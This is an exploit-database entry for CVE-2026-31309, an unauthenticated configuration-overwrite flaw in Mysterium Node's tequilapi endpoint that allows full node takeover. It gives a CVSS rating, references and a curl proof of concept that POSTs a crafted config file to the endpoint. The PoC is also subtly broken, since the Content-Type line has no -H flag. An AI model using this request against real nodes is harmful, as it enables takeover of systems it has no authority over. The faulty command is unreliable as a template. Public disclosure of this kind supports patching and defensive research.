Share
## https://sploitus.com/exploit?id=PACKETSTORM:226144
# CVE-2026-31309: Improper Access Control in Mysterium Node before v1.36.0
    
    Improper authorization in the `/tequilapi/config/user` endpoint of Mysterium Node from `v1.21.1-rc0` before `v1.36.0` allows an unauthenticated attacker to arbitrarily overwrite the node's configuration and achieve a full node takeover via a crafted POST request.
    
    ## CVSS
    
    Score: 9.8 (CRITICAL)
    
    Vector: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
    
    ## PoC
    
    ```bash
    curl -X POST \
        "Content-Type: application/json" \
        -d @config.json \
        http://<host>:<port>/tequilapi/config/user
    ```
    
    Discovered by Till Schacht.
    
    ## References
    
    - <https://nvd.nist.gov/vuln/detail/CVE-2026-31309>
    - <https://www.cve.org/CVERecord?id=CVE-2026-31309>
    - <https://github.com/advisories/GHSA-p7gf-g6r8-g65h>